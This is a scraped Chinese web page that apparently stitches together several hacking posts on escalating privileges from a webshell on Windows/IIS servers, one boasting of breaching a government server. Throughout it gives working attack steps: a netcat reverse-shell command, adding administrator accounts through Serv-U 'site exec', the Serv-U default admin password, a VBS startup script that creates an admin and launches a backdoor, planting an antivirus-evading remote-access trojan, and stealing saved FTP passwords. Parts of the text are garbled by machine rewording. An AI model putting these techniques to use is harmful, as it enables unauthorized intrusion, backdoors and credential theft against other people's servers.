下次自动登录
您现在的位置:
今天提权用到的jsp shell 很好用，好像是t00ls.net出品的
今天渗透一台政府服务器，因为是jsp的站，手头没有现成的jsp shell，找了几个功能都不怎么样，后来发现这个真的很不错，跟aspxspy有的一拼哈，两者的界面风格一致...莫非....
下载地址：
老外收集的asp+php+jsp下载地址（附带一个很好用的jsp backdoor）：
【上一篇文章】【下一篇文章】webshell下提权两个小技巧分享
作者：佚名
字体：[ ] 来源：互联网 时间：03-31 21:53:20
webshell下提权两个小技巧分享，需要的朋友可以测试下。
webshell提权小技巧 cmd路径: c:\windows\temp\cmd.exe nc也在同目录下 例如反弹cmdshell： &c:\windows\temp\nc.exe -vv ip 999 -e c:\windows\temp\cmd.exe& 通常都不会成功。 而直接在 cmd路径上 输入 c:\windows\temp\nc.exe 命令输入 -vv ip 999 -e c:\windows\temp\cmd.exe 却能成功。。 这个不是重点 我们通常 执行 pr.exe 或 Churrasco.exe 时 有时候也需要 按照上面的 方法才能成功。
友情检测波尔远程控制官方网站作者：MYC00l [Y.D.T]
第一处：把代码保存为1.vbs 上传到服务器上，执行cscript 1.vbs，又提示拒绝访问。
其实这里，我们只要自己上传一个cscript.exe 一般就可以解决问题，这个程序默认位于系统文件夹下，是win32 控制台下的脚本宿主引擎，用来执行vbs 等脚本程序的。
第二处：用VBS脚本查看到目标IIS帐号和密码后，CMD下FTP发现目标用的是微软FTP，直接用IIS帐号和密码登录进去了。IIS帐号和密码和微软自带的FTP帐号和密码默认都是一样的。
大家感兴趣的内容
12345678910
最近更新的内容webshell 提权方法 服务器提权教程
作者：佚名
字体：[ ] 来源：互联网 时间：09-30 00:30:02
提高入侵网站服务器的成功率，从事网络安全的朋友可以参考下，如果防范。
一：首先检测一下网站的服务器是否开了 3389 远程终端 二：检测一下服务是否用了serv-u （还有是什么版本的） 方法 一：复制一个网站 用 3389 登陆器连接一下 （是否成功） 能连接了，拿下服务器的机率，提高 30%了 二：用ftp模式查下一个服务器的版本 开始 -- 运行 -- cmd -- ftp (加你要登陆的网站) --------------------------------------------------------------------------------------- 第一步：最简单的方法 看有没有权限，能不能执行命令，行的话直接传个鸽子运行（成功率非常低） ---------------------------------------------------------------------------------------- 第二步：:寻找有执行的权限目录 c:\winnt\system32\inetsrv\data\ c:\Documents and Settings\All Users\ c:\Program Files\serv-u\ C:\Program Files\Microsoft SQL Server\ 这样的目录可以直接上传鸽子，运行 ----------------------------------------------------------------------------------- 第三步：传个cmd和开帐号的ftp.exe上去直接加帐号 命令就是你上传目录D:\VMware Workstation\cmd.exe &net user xiao xiao /add& ----------------------------------------------------------------------------------- 第四步：asp提权木马直接提权 serv-u 6.3 版本 好象用asp提权木马（不成功） serv-u 6.2 版本 好象可以 不过提权能不能用asp木马还要看服务器，设置的变态不 假设直接用asp提权成功之后，还是不成功，但是可以在 cmd之下 用这个帐号连接一下 ftp (加你提权的网站) 帐号：LocalAdministrator 密码：$ak#.1k;0@p&&#1@$ak#.1k;0@p 如果成功连接后就可以直接添加管理员帐号了 命令：quote site exec (你添加的帐号) net user 123 123 /ad quote site exec （把帐号提升到最高权限） net localgroup administartors 123 /add --------------------------------------------------------------------------------------- 第五步：pcaanywhere C:\Documents and Settings\All Users\Application Data\Symantec\pcAnywhere\ 这里下他的GIF文件，在本地安装pcanywhere上去 网上很多教程 --------------------------------------------------------------------------------------- 第六步：serv-u覆盖提权 本地安装个su，将你自己的ServUDaemon.ini文件用从他那下载下来的ServUDaemon.ini 网上很多教程 ---------------------------------------------------------------------------------------- 第七步：Serv-U转发端口 给Latte加盐 曾经做个一个（serv-u经典提权全套教程）用到过这个方法，可以学习一下 上传个端口转发工具 命令：（工具名）&v &l 3333 &r .0.1 意思是将3333端口映射到43958端口上。 然后就可以在本地安装一个Serv-u，新建一个服务器， IP填对方IP，帐号为LocalAdministrator 密码为$ak#.1k;0@p&&#1@$ak#.1k;0@p， 连接上后你就可以管理他的Serv-u了 -------------------------------------------------------------------------------------------- 第八步：社会工程学之提升提权 把灰鸽子传到上面，然后转移到c盘，就等着管理员运行了，前提你的鸽子必须免杀 要是让我看到一个不清楚的exe程序，老想点开看看，呵呵(估计没有那个SB会点吧)
大家感兴趣的内容
12345678910
最近更新的内容博客访问： 1223
博文数量： 2
博客积分： 0
博客等级： 民兵
技术积分： 20
注册时间：
APP发帖 享双倍积分
IT168企业级官微
微信号：IT168qiye
系统架构师大会
微信号：SACC2013
分类： BSD
很经典的webshell提权
说到花了九牛二虎的力量取得了一个webshell， 当然还想持续失掉全部服务器的admin权限，正如不想得到admin的不是好黑客～ 嘻嘻～～好跟我来，看看有什么可以利用的来提升权限 ............................................................................ 第一 如果服务器上有装了pcanywhere服务端，管理员为了管理方便 也给了咱们便利，到体系盘的Documents and Settings/All Us ers/Application Data/Symantec/pcAnywhere/中下载..cif本地 破解就使用pcanywhere连接就ok了 ............................................................................ 第二 有良多小黑问我这么把webshell的iis user权限晋升 普通服务器的管理都是本机设计结束然后上传到空间里，那么就会用到ftp，服务器使用最多的就是servu 那么我们就利用servu来提升权限 通过servu提升权限须要servu装置目录可写～ 好开始把，首先通过webshell拜访servu安装文件夹下的ServUDaemon.ini把他下载 下来，然后在本机上安装一个servu把ServUDaemon.ini放到本地安装文件夹下笼罩， 启动servu添加了一个用户，设置为系统管理员，目录C:，存在可执行权限 然后去servu安装目录里把ServUDaemon.ini调换服务器上的。 用我新建的用户和密码衔接～ 好的，还是连上了 ftp ftp open ip Connected to ip. 220 ServU FTP Server v5.0.0.4 for WinSock ready... User (ip:(none)): id //方才增添的用户 331 User name okay, please send plete Email address as password. Password:password //密码 230 User logged in, proceed. ftp
cd winnt //进入win2k的winnt目录 250 Directory changed to /WINNT ftp cd system32 //进入system32目录 250 Directory changed to /WINNT/system32 ftp quote site exec net.exe user rover rover1234 /add //利用系统的net.exe 文件加用户。 如果提醒没有权限，那我们就 把后门server.exe 传他system32目录 然后写一个VBs教本 set wshshellcreateobject ("w cript.shell") awshshell.run ("cmd.exe /c net user user pass /add",0) bwshshell.run ("cmd.exe /c net localgroup Administrators user /add",0) bwshshell.run ("cmd.exe /c server.exe",0) 存为xx.vbe 这个教本的作用是树立user用户密码为pass 并且提升为管理员 而后履行system32目录下的server.exe 把这个教本传他 C:Documents and SettingsAll Users.开端.菜单程序启动 目录 这样管理员只有一登陆就会执行那个教本. 接下来就是等了.等他登陆. ............................................................................ 第三 就是先检讨有什么系统服务，或者随系统启动主动启动的程序和管理员常常使用的软件， 好比诺顿，VAdministrator，金山，瑞星,WinRAR甚至QQ之类的，是否可以写，如果可以就修正其程序， 绑定一个批处理或者VBS，然后仍是等候服务重视启。 ............................................................................ 第四 查找conn跟config ,pass这类型的文件看是否得到sa或者mysql的相干密码，可能会有所 播种等等。 ............................................................................ 第五 使用Flashfxp也能提升权限，然而胜利率就看你本人的福气了 首先找到FlashFXP文件夹，打开(编纂)Sites. dat，这个文件这是什么东西密码和用户名， 而且密码是加了密的。 如果我把这些文件copy回本地也就是我的盘算机中，调换我本地的相应文件。然后会发明 翻开flashfxp在站点中打开站点治理器一样。又可以增加N多肉鸡啦～～嘻嘻～ 唔··错误啊，是来提升权限的啊，晕，接着来别中途而废。 大家看看对方管理员的这站点管理器，有用户名和密码，密码是星,的。经过用xp星,密码 查看器查看，然后和Sites.dat中加密了密码做比拟发现并未加密而是查到的密码是明文显示， 然后终极把这个网站管理员的密码从这堆东西中找 出来。那么下一步就能够链接这些新的服务器啦～～ 经由测试只要把含有密码和用户名的Sites.dat文件替代到本地相应的文件就可以在本地 还原对方管理员的各个站点的密码。 ............................................................................ 第六WIN2K+IIS5.0默认情况下利用程序维护选项是"中共用的"，这时IIS加载isapi是用的 iwam_putername用户身份执行。 但默认情况下WIN2K+IIS5对一些特别isapi又要以system身份加载。win2k+iis5 、 win2k+iis5+sp1、win2k+iis5+sp2都是简略的断定isapi的文件名，并且不做目录限度， 以SYSTEM权限加载的isapi有： 1、 idq.dll 2、 ext.dll 3、 odbc.dll 4、 ssinc.dll 5、 msw3prt.dll 6、 author.dll 7、 admin.dll 8、 shtml.dll 9、 sspifilt.dll 10、pfilt.dll 11、pwsdata.dll 12、md5filt.dll 13、fpexedll.dll 所以应用这很轻易得到SYSTEM权限。并且判定文件名的时候有个bug，比方请求/ cripts/test815cssinc.dll也将会以为是要求的ssinc.dll,就是分别文件路径的时候没有斟酌到双字节的 远东版问题。ssinc.dll在处置包括文件门路的时候也有一个问题，就是"/"、""只辨认了一个 "/"，所以假如恳求里面应用""，就会过错的处理包含文件路径，有可能泄漏货色或者呈现权限 漏洞，这种破绽许多别的处所 php、asp等也还存在。 加载这些isapi不是单以文件名做根据了，而是加了路径，应当是修改了此问题。 个别默认情形下是： 1、 idq.dll d:winntsystem32idq.dll 2、 ext.dll d:winntsystem32inetsrvext.dll 3、 odbc.dll d:winntsystem32inetsrvodbc.dll 4、 ssinc.dll d:winntsystem32inrtsrvssinc.dll 5、 msw3prt.dll d:winntsystem32msw3prt.dll
阅读(423) | 评论(0) | 转发(0) |
下一篇：没有了
相关热门文章
给主人留下些什么吧！~~
请登录后评论。